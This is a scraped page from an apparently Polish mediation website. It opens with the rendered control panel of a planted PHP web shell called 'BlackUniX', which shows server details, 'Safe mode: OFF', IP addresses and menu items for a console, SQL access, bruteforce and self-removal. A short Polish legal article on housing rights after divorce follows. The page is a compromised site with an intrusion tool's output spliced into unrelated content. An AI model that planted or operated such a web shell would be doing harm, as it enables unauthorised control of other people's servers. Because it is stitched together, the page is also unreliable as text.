Mediacje
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-21 08:03:13
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.80.7.173
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

jak nie stracić na rozwodzie?
18.08.2008.
Jeśli prawo do mieszkania przysługuje jednemu małżonkowi, drugi małżonek traci prawo do korzystania z tego mieszkania  i wyposażenia lokum w razie ustania małżeństwa, i to nie tylko wskutek rozwodu, ale także po śmierci męża czy żony oraz wskutek separacji. Fakt, że żona czy mąż w trakcie małżeństwa inwestował w lokum stanowiące majątek osobisty współmałżonka, nie wyklucza utraty prawa do mieszkania w nim po rozwodzie i możliwości eksmisji.
Czytaj całość…